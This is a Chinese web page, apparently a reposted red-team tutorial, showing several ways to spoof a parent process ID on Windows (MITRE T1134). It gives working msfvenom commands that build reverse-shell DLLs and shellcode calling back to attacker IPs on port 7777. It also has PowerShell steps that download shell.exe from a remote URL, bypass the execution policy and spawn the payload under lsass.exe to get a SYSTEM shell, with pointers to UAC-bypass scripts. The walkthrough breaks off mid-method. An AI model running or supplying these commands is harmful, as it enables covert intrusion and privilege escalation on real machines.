江苏龙网

  1. 主页 > 生活百科 > >

T1134 红队技术-父进程欺骗( 二 )

生活经验红队


文章插图
方法二(使用Powershell DLL注入进行PID欺骗)
F-Secure 实验室利用 powershell 创建了替代上述Didier 二进制文件的方案 。它也可以用于父进程欺骗,与上述方法不同之处在于,可以将带有注入的DLL的子进程派生为子进程,功能更强大 。代码可以在这里下载***/countercept/ppid-spoofing,首先在受害者机器上查看进程ID,这里我们选择 Powershell 的 PID 24092 作为父进程ID 。

T1134 红队技术-父进程欺骗

文章插图
利用msfvenmon生成要注入的DLL
msfvenom -p windows/x64/shell_reverse_tcp exitfunc=thread LHOST=172.27.115.207 LPORT=7777 -f dll > shell.dll[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload[-] No arch selected, selecting arch: x64 from the payloadNo encoder specified, outputting raw payloadPayload size: 460 bytesFinal size of dll file: 8704 bytes然后进行注入:
Import-Module .\PPID-Spoof.ps1PPID-Spoof -ppid 24092 -spawnto "C:\Windows\System32\notepad.exe" -dllpath .\shell.dll
T1134 红队技术-父进程欺骗

文章插图
T1134 红队技术-父进程欺骗

文章插图
可以看到注入的DLL在Notepad.exe中加载执行了 。
T1134 红队技术-父进程欺骗

文章插图
通过这种方式,PPID 24092上的powershell.exe进程派生了一个带有插入代码(由DLL提供)的notepad.exe 。
方法三(使用Powershell 脚本入进行PID欺骗)
Decoder-it 根据 Didier Stevens 提供的指南开发了一个 powershell 脚本,使用了 CreateProcessFromParent() 方法,可以在此处找到的psgetsystem脚本:***/decoder-it/psgetsystem.git,可用于通过PID欺骗派生子进程 。首先我们查看所需进程的 PID 。这里以lsass.exe为例
T1134 红队技术-父进程欺骗

文章插图
然后执行如下命令:
powershell -ep bypassImport-Module .\psgetsys.ps1[MyProcess]::CreateProcessFromParent(520,".\shell.exe","")
T1134 红队技术-父进程欺骗

文章插图
如果报错,可能是UAC的问题,需要先绕过UAC,或者是权限过低,需要提权 。
绕过UAC脚本可以在这里找到:***/samratashok/nishang/tree/master/Escalation
T1134 红队技术-父进程欺骗

文章插图
然后下载所需的文件,然后执行命令
$client=new-object System.Net.WebClient $client.DownloadFile("http://<url>/psgetsys.ps1",".\psgetsys.ps1")$client.DownloadFile("http://<url>/shell.exe",".\shell.exe")Import-Module .\psgetsys.ps1[MyProcess]::CreateProcessFromParent(520,".\shell.exe","")
T1134 红队技术-父进程欺骗

文章插图
可以看到在lsass.exe下成功创建了子进程,因为lsass.exe是system权限 , 所以反弹shell也获取到了system权限 。
T1134 红队技术-父进程欺骗

文章插图


T1134 红队技术-父进程欺骗

文章插图
方法四(使用C#程序进行PID欺骗)
py7hagoras开发了GetSystem项目 , 是上述技术的C#实现,可以在这里找到:***/py7hagoras/GetSystem.git
在目标机上下载GetSystem.exe,然后执行GetSystem.exe 自定义程序 -O 目标进程名
GetSystem.exe shell.exe -O lsass
T1134 红队技术-父进程欺骗

文章插图


T1134 红队技术-父进程欺骗

文章插图


T1134 红队技术-父进程欺骗

文章插图
注意:这里可能也需要绕过UAC或者提权,不然执行不成功 。
方法五(通过PID欺骗注入Shellcode)
【T1134 红队技术-父进程欺骗】Chirag Savla 使用 C# 开发了一个名为“ProcessInjection”的出色工具,它可以执行许多功能,包括通过 PID 欺骗进行的进程注入 。通过提供有效的 PID,该工具会尝试使用 CreateProcess 等原生 API 调用来欺骗 PID,然后将代码注入其中 。该工具支持 hex、C 和 base64 格式的shellcode ,也可以选择 DLL 注入 。工具在这里下载:***/3xpl01tc0d3r/ProcessInjection
首先,使用msfvenom创建一个shellcode代码
msfvenom -p windows/x64/shell_reverse_tcp -exitfunc=thread LHOST=172.19.218.248 LPORT=7777 -f hex > /hex.txt然后在目标机中下载


推荐阅读


上一篇:拿营业执照可以买社保

下一篇:高刷新率屏幕真的有用吗 什么叫高刷新率屏幕